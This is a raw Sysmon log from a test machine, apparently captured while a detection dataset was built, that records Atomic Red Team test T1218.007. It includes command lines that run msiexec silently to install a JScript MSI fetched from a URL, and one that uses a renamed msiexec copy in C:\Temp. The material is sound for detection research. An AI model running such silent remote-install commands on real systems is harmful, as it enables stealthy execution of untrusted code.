15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691086Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691078Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691077Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691076Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691075Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691074Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691073Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691072Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691069Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691045Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691043Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691042Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691041Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691038Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691014Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691012Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691011Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691010Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691009Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691008Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691007Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691006Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691005Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691003Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691002Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691000Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002690999Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002690998Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002690973Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002690972Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002690971Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002690968Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.412{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002690967Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.397{7CF983DC-EE97-62A8-7E00-000000006202}18083404C:\Windows\system32\csrss.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002690966Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.397{7CF983DC-1D68-62AB-A142-000000006202}3672704C:\Windows\system32\cmd.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002690965Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.395{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exemsiexec.exe /q /i "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi"C:\Users\Administrator\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-1D68-62AB-A142-000000006202}3672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" WIN-HOST-MHAAG-\Administrator 154100x80000000000000002734771Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 16:04:12.791{7CF983DC-A5FC-62AC-DB6C-000000006202}2492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Command Write-Host JScript executed me!; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-A5FC-62AC-DA6C-000000006202}4832C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 9B1153D134270752357B2DF9718CC17AWIN-HOST-MHAAG-\Administrator 154100x80000000000000002734698Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 16:04:12.709{7CF983DC-A5FC-62AC-DA6C-000000006202}4832C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 9B1153D134270752357B2DF9718CC17AC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-A5FC-62AC-D96C-000000006202}4244C:\Windows\System32\msiexec.exeC:\Windows\system32\msiexec.exe /VNT AUTHORITY\SYSTEM 154100x80000000000000002734549Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 16:04:12.582{7CF983DC-A5FC-62AC-D96C-000000006202}4244C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{7CF983DC-EE56-62A8-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-EE56-62A8-0A00-000000006202}604C:\Windows\System32\services.exeC:\Windows\system32\services.exeNT AUTHORITY\SYSTEM 154100x80000000000000002734490Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 16:04:12.539{7CF983DC-A5FC-62AC-D86C-000000006202}1812C:\Temp\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exec:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi"C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-A5FC-62AC-D66C-000000006202}652C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002734455Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 16:04:12.512{7CF983DC-A5FC-62AC-D76C-000000006202}2556C:\Windows\System32\conhost.exe10.0.14393.0 (rs1_release.160715-1616)Console Window HostMicrosoft® Windows® Operating SystemMicrosoft CorporationCONHOST.EXE\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-A5FC-62AC-D66C-000000006202}652C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002734448Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 16:04:12.479{7CF983DC-A5FC-62AC-D66C-000000006202}652C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\temp\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_JScript.msi""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 154100x80000000000000002918012Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 21:37:15.141{7CF983DC-F40B-62AC-DD74-000000006202}4584C:\Temp\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exe"C:\Temp\msiexec.exe" C:\Temp\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-EE9A-62A8-8800-000000006202}3068C:\Windows\explorer.exeC:\Windows\Explorer.EXEWIN-HOST-MHAAG-\Administrator